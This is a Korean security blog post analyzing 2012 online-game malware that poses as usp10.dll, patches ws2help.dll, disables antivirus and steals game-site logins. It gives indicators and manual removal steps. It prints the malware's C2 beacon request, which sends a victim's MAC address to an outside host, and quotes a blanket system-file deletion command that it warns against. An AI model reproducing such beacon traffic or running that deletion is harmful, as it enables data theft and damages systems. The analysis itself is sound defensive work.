2012년 8월 초부터 온라인 게임 악성코드 유포에 usp10.dll 시스템 파일로 위장한 방식을 이용하는 행위가 확인되었으며, 이번 주말에는 대량의 usp10.dll 복제 파일 생성과 중복 감염을 유발하는 방식으로 감염 PC를 유지하려는 사례에 대해 살펴보도록 하겠습니다. 

원래 usp10.dll 시스템 파일을 악용한 사례는 기존에도 존재하였던 것으로 알고 있으며, 정상적인 시스템에서는 "C:\WINDOWS\system32\usp10.dll" 파일(Uniscribe Unicode script processor) 위치에 존재합니다. 

또한 그 외의 응용 프로그램 폴더(MS Office 폴더) 및 윈도우 폴더에 usp10.dll 파일이 존재할 수 있습니다.

 

  lpk.dll, usp10.dll 시스템 파일을 삭제 시도하는 OTP 해킹툴 제거기 주의 (2011.10.8)

 

참고로 예전부터 인터넷 상에서 usp10.dll 파일은 무조건 삭제해야 하는 파일인 것처럼 "del usp10.dll lpk.dll /a /s" 명령어를 이용한 삭제 방법이 전파되고 있는데 올바른 방법이 아니므로 이용하지 마시기 바랍니다.

 

이번 온라인 게임 악성코드 유포에도 기존과 마찬가지로 사용자가 윈도우(Windows), Adobe Flash Player, Oracle JRE 최신 버전 및 보안 패치를 제대로 설치하지 않은 상태에서 인터넷을 이용하는 과정에서 자동으로 감염이 되는 것으로 추정됩니다.

 

이를 통해 최종적으로 다운로드된 악성 파일(MD5 : 147309993431b7c271179fa83d3fa0f1)에 대하여 AhnLab V3 보안 제품에서는 ASD.Prevention (VirusTotal : 19/41) 진단명으로 진단되고 있습니다.

C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\plN.sys (MD5 : 0cfb3dc469a6fd6a73239c661751539a) - AhnLab V3 : Trojan/Win32.KillAV (VirusTotal : 1/41)

 

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PLN.SYS
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\plN.sys

최초 감염이 시작되면 알약(ALYac), AhnLab V3 등 특정 보안 제품이 설치된 PC 환경에서는 임시 폴더에 plN.sys 드라이버를 생성하여 백신 무력화를 실행한 후 자가 삭제 처리가 이루어집니다.

 

그 이후 프로그램 폴더(C:\Program Files) 내부와 윈도우 폴더에 usp10.dll 악성 파일을 다수 생성합니다.

 

[프로그램 / 윈도우 폴더 내에 생성된 usp10.dll 악성 파일 정보]

 

C:\Program Files\7-Zip\usp10.dll
C:\Program Files\Adobe\Acrobat.com\usp10.dll
C:\Program Files\Adobe\Reader 9.0\Reader\usp10.dll
C:\Program Files\Adobe\Reader 9.0\Resource\Icons\usp10.dll
C:\Program Files\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\usp10.dll
C:\Program Files\Common Files\Adobe AIR\Versions\1.0\usp10.dll
C:\Program Files\Common Files\Adobe\Updater6\usp10.dll
C:\Program Files\Common Files\Java\Java Update\usp10.dll
C:\Program Files\Common Files\Microsoft Shared\DW\usp10.dll
C:\Program Files\Common Files\Microsoft Shared\MSInfo\usp10.dll
C:\Program Files\Common Files\Microsoft Shared\Speech\usp10.dll
C:\Program Files\ESTsoft\ALUpdate\usp10.dll
C:\Program Files\Internet Explorer\Connection Wizard\usp10.dll
C:\Program Files\Internet Explorer\usp10.dll
C:\Program Files\Java\jre6\bin\usp10.dll
C:\Program Files\Messenger\usp10.dll
C:\Program Files\Movie Maker\usp10.dll
C:\Program Files\MSN Gaming Zone\Windows\usp10.dll
C:\Program Files\NetMeeting\usp10.dll
C:\Program Files\Outlook Express\usp10.dll
C:\Program Files\Windows Media Player\usp10.dll
C:\Program Files\Windows NT\Accessories\usp10.dll
C:\Program Files\Windows NT\usp10.dll


※ 해당 usp10.dll(MD5 : 5970f785c5cd1bd39c438f73882a0790) 파일들은 AhnLab V3 보안 제품에서 Trojan/Win32.OnlineGameHack (VirusTotal : 5/40) 진단명으로 진단되고 있습니다.

 

C:\WINDOWS\usp10.dll
 - MD5 : e5cadbbd11399ea1d0ab4c460403efd1
 - AhnLab V3 : Trojan/Win32.OnlineGameHack (VirusTotal : 5/41)


※ 해당 파일의 MD5 값은 랜덤(Random)하게 생성되며, 숨김(H) 속성값이 아닙니다.

우선 프로그램 폴더(C:\Program Files) 내부에 생성된 usp10.dll 악성 파일을 살펴보면 시스템(S), 숨김(H) 속성값을 가지는 모두 동일한 파일 크기(MD5)를 가지고 있으며, 사용자의 PC에 설치된 응용 프로그램 종류에 따라 다양한 폴더 위치에 생성합니다.(※ 감염시마다 MD5 값은 랜덤(Random)합니다.)

 

또한 추가적으로 외부의 특정 서버에 접속하여 다음과 같은 다운로드를 진행하도록 제작되어 있습니다.

  • h**p://****.qogus.com/***/817exe.txt (MD5 : 8c6ebf3c84810d14ff444e2085d0f0de) - AhnLab V3 : Trojan/Win32.OnlineGameHack (VirusTotal : 20/35)
GET /666blood/post.asp?d10=(사용자 Mac Address)&d11=ver-2.0-cz&d21=55&d22=(OS 종류) HTTP/1.1
User-Agent: Example
Host: ps.alsoejfd.com

참고로 인터넷 임시 폴더에 다운로드된 파일(817exe.txt)은 "C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\plNU.temp" 임시 파일로 생성 후 ws2help.dll 시스템 파일(Windows Socket 2.0 Helper for Windows NT) 패치 후 자가 삭제되도록 제작되어 있습니다.

 

또한 이 과정에서 사용자 Mac Address 및 운영 체제(OS) 종류, 악성 파일 버전 등의 정보를 체크하는 동작을 확인할 수 있습니다.

 

ws2help.dll 시스템 파일을 패치하는 과정을 살펴보면 ① ws2help.dll 시스템 파일 기능을 하는 "C:\WINDOWS\system32\ws2helpxp.dll" 파일을 생성하며 ② "C:\WINDOWS\system32\dllcache\ws2help.dll" 시스템 백업 파일의 이름을 변경하여 복원을 어렵게 하며 ③ 패치된 ws2help.dll 악성 파일 기능을 하는 "C:\WINDOWS\system32\ws2help.dll.(4자리 영문+숫자).tmp" 파일을 임시로 생성하며 ④ "C:\WINDOWS\system32\ws2help.dll" 시스템 파일의 이름을 변경하며 ⑤ ③번에서 생성한 ws2help.dll.(4자리 영문+숫자).tmp 파일을 ws2help.dll 악성 파일로 이름을 변경합니다.

 

[최초 패치된 ws2help.dll 파일 정보]

 

C:\WINDOWS\system32\dllcache\ws2help.dll.ORH.tmp :: 정상 파일

※ 해당 파일은 ws2help.dll.(3자리 영문+숫자).tmp 형태입니다.

 

C:\WINDOWS\system32\ws2help.dll

 - MD5 : 9358c03b9113ef04b1d279d8f8fd932d
 - AhnLab V3 : Win-Trojan/Onlinegamehack.80896.BE (VirusTotal : 17/42)

 

C:\WINDOWS\system32\ws2help.dll.E6xH.tmp :: 감염 전 ws2help.dll 백업 파일(정상 파일)

※ 해당 파일은 ws2help.dll.(4자리 영문+숫자).tmp 형태이며, 시스템 재부팅시 삭제 처리됩니다.

 

C:\WINDOWS\system32\ws2helpxp.dll :: ws2help.dll(정상 파일)

 

이렇게 감염된 환경에서 usp10.dll 파일이 추가된 응용 프로그램 및 윈도우 탐색기 등의 동작이 이루어질 경우, 다음과 같은 추가적인 체크 및 다운로드 동작을 확인할 수 있습니다. 

  • h**p://**1.oqaiqprso.com/***/m720.exe (MD5 : bbff257004243d3af5d6336c807780e4) - AhnLab V3 : Trojan/Win32.OnlineGameHack (VirusTotal : 18/42) :: ws2help.dll 패치
  • h**p://**2.oqaiqprso.com/***/m720x.exe (MD5 : 3a390a725aa9105cb585aa42bbbaf377) - AhnLab V3 : Dropper/Win32.OnlineGameHack (VirusTotal : 16/42) :: usp10.dll 생성
  • h**p://**3.oqaiqprso.com/***/m720x.exe (MD5 : 3a390a725aa9105cb585aa42bbbaf377) - AhnLab V3 : Dropper/Win32.OnlineGameHack (VirusTotal : 16/42) :: usp10.dll 생성

이 중에서 m817.txt 파일에 등록된 m720.exe, m720x.exe 2개의 파일을 추가적으로 다운로드하여 기존에 1차적으로 패치된 ws2help.dll 악성 파일의 이중 패치 및 프로그램 폴더 내에 usp10.dll 악성 파일을 추가적으로 재생성하는 동작을 확인할 수 있습니다.

 

인터넷 임시 폴더에 다운로드된 m720.exe 파일은 기존과 마찬가지로 "C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\plNU.temp" 파일을 생성하여 ws2help.dll 파일에 대해 재패치를 수행한 후 자가 삭제 처리됩니다.


[2차 감염으로 인한 ws2help.dll 악성 파일 변화]


C:\WINDOWS\system32\ws2help.dll

 - MD5 : 1423e5c0e7760dd941c998831352d05a

 - AhnLab V3 : Trojan/Win32.OnlineGameHack (VirusTotal : 17/41)


C:\WINDOWS\system32\ws2help.dll.2Z8r.tmp :: 기존의 ws2help.dll 악성 파일 백업 파일

 - MD5 : 9358c03b9113ef04b1d279d8f8fd932d

 - AhnLab V3 : Win-Trojan/Onlinegamehack.80896.BE (VirusTotal : 17/42)

※ 해당 파일은 ws2help.dll.(4자리 영문+숫자).tmp 형태이며, 시스템 재부팅시 삭제 처리됩니다.


C:\WINDOWS\system32\ws2help.dll.E6xH.tmp :: 감염 전 ws2help.dll 백업 파일(정상 파일)

※ 해당 파일은 ws2help.dll.(4자리 영문+숫자).tmp 형태이며, 시스템 재부팅시 삭제 처리됩니다.


C:\WINDOWS\system32\ws2help.dll.pWJ7.tmp :: 이중 패치된 ws2help.dll 악성 파일 백업 파일

 - MD5 : 1423e5c0e7760dd941c998831352d05a

 - AhnLab V3 : Trojan/Win32.OnlineGameHack (VirusTotal : 17/41)

※ 해당 파일은 ws2help.dll.(4자리 영문+숫자).tmp 형태이며, 시스템 재부팅시 삭제 처리됩니다.


C:\WINDOWS\system32\ws2helpxp.dll :: ws2help.dll(정상 파일)

최초 감염시 패치되었던 ws2help.dll 악성 파일은 위와 같이 이중 패치가 이루어지며, 시스템 재부팅이 이루어진 경우에는 임시 백업 파일들은 모두 삭제 처리가 됩니다.

 

또한 인터넷 임시 폴더에 다운로드된 m720x.exe 파일은 "C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\(8자리 영문+숫자).pif" 파일 형태(MS-DOS 프로그램으로 바로 가기)로 생성되어 프로그램 폴더 내에 usp10.dll 악성 파일을 재생성하며, 시스템 재부팅 이후 또는 PC 사용 과정에서 다운로드 동작 및 파일 생성은 반복적으로 발생할 수 있습니다.

참고로 해당 파일(MD5 : 3a390a725aa9105cb585aa42bbbaf377)은 AhnLab V3 보안 제품에서 Dropper/Win32.OnlineGameHack (VirusTotal : 16/42) 진단명으로 진단되고 있습니다.

 

이렇게 감염된 환경에서 악성 파일의 기능을 간단하게 확인해보면 기존과 마찬가지로 다수의 온라인 게임, 문화 상품권 웹 사이트의 계정 정보를 탈취하여 금전적 수익을 창출하는 것을 확인할 수 있습니다. 

예를 들어 사용자가 Internet Explorer 웹 브라우저를 실행할 경우 iexplore.exe 프로세스에 "C:\Program Files\Internet Explorer\usp10.dll", "C:\WINDOWS\system32\ws2help.dll" 2개의 악성 파일을 추가하여 정보 수집 및 전송, 추가 다운로드 기능을 수행합니다. 

  • teencash.co.kr
  • aion.plaync.co.kr
  • mabinogi.nexon.com
  • kr.battle.net
  • df.nexon.com
  • hangame.com
  • netmarble.net
  • pmang.com

현재 아이디(ID), 비밀번호, OTP 정보 등을 수집하는 타켓 사이트는 목록과 같으며, 온라인 게임 중 디아블로 3(Diablo 3)도 노리고 있는 것을 확인할 수 있습니다.

 

그 외에 알약(ALYac), AhnLab V3, AhnLab SiteGuard, 네이버 백신(Naver Vaccine) 등 백신 무력화 기능이 포함되어 있습니다.

 

결론적으로 해당 악성코드에 감염된 경우 백신 프로그램의 도움없이는 수동으로 문제 해결에 매우 어려움이 예상되고 있지만, 백신의 정상적인 동작을 방해하는 기능으로 인해 일부 사용자의 경우에는 곤란을 겪을 것으로 판단됩니다.

 

그러므로 최악의 경우에는 다음과 같은 방법으로 수동으로 문제 해결을 위한 방법이 있으므로 잘 응용해 보시기 바라며 반드시 절차를 준수하도록 하시기 바랍니다. 

참고로 파일 확인을 위해서는 폴더 옵션에서 "보호된 운영 체제 파일 숨기기(권장)" 체크 해제 및 "숨김 파일 및 폴더 표시"에 체크를 하시고 진행하시기 바랍니다.

 

(1) 해당 악성코드에 감염된 경우 특정 서버로부터 지속적인 다운로드를 통해 재감염이 이루어질 수 있으므로 인터넷 연결 차단(인터넷 모뎀 OFF) 후 안전 모드(F8)로 접속하시기 바랍니다. 

(2) 안전 모드로 접속한 이후에는 윈도우 탐색기를 실행하여 "C:\WINDOWS\system32\dllcache\ws2help.dll.(3자리 영문+숫자).tmp" 파일을 ws2help.dll 파일명으로 수정하시기 바랍니다. 

 

(3) "C:\WINDOWS\system32\ws2help.dll" 악성 파일명을 변경하시기 바랍니다.(※ 예 : ws2help.dll-Malware)

 

(4) (2)번에서 수정한 "C:\WINDOWS\system32\dllcache\ws2help.dll" 파일을 "C:\WINDOWS\system32" 폴더에 복사(Copy) 하시기 바랍니다. 

(5) "C:\WINDOWS\usp10.dll" 악성 파일명을 변경하시기 바랍니다.(※ 예 : usp10.dll-Malware)

 

(6) "C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\(8자리 영문+숫자).pif" 파일(MS-DOS 프로그램으로 바로 가기)을 찾아 삭제하시기 바랍니다.(※ 해당 파일은 다수 존재할 수 있습니다.) 

이제 프로그램 폴더 내에 생성된 다수의 usp10.dll 파일을 찾아 수동으로 삭제를 하는 문제가 있으며, 앞서 말한 것처럼 정상적인 usp10.dll 파일이 존재할 수 있으므로 다음과 같은 방법으로 악성 파일을 구별하여 수동으로 삭제하시기 바랍니다. 

테스트 환경에서는 CMD 모드에서 "dir /a /s \usp10.dll" 명령어를 이용하여 C 드라이브에 존재하는 모든 usp10.dll 파일을 검색하여 결과를 폴더 위치, 파일 크기를 표시하도록 하였습니다.

 

테스트 PC에서는 총 37개의 usp10.dll 파일이 발견되었으며, 그 중에는 악성 파일(녹색)과 정상적인 파일(노란색)이 함께 표시됩니다.

 

이 중에서 프로그램 폴더(C:\Program Files) 내의 파일 중 동일한 파일 크기(24,576 바이트)는 모두 감염으로 생성된 악성 파일을 의미하므로 파일 위치를 하나씩 확인하여 수동으로 삭제하시기 바랍니다.(※ 24,576 바이트 파일 크기는 감염시 달라질 수 있습니다.)

 

모든 조치가 완료된 후에는 시스템 재부팅을 통해 정상적인 윈도우 모드로 진입하여 다음의 파일을 수동으로 삭제하시기 바랍니다.

  • C:\WINDOWS\usp10.dll-Malware
  • C:\WINDOWS\system32\ws2help.dll-Malware
  • C:\WINDOWS\system32\ws2helpxp.dll

수동 조치를 통해 무력화되었던 백신 프로그램 역시 정상적으로 동작을 하게 되므로 최신 DB 업데이트를 통한 정밀 검사를 진행하시기 바랍니다.

 

또한 위와 같은 악성코드에 감염되지 않기 위해서는 윈도우(Windows) 보안 패치를 비롯한 Adobe Flash Player(※ 필수), Oracle JRE(설치 PC의 경우) 프로그램을 최신 버전으로 업데이트하시고 인터넷을 이용하시기 바랍니다.

 

또한 최근에는 국내에서 제작된 다양한 검색 도우미, 파일 다운로드 프로그램의 서버가 해킹되는 문제로 인해 온라인 게임 악성코드, 백도어(Backdoor) 등이 설치되는 사례가 빈번하게 발생하고 있으므로 PC에 설치된 광고성(수익성) 프로그램이 존재할 경우 모두 제거하시는 것이 안전합니다.


블로그 이미지

울지않는 벌새

울지않는벌새가 되고 싶은 나..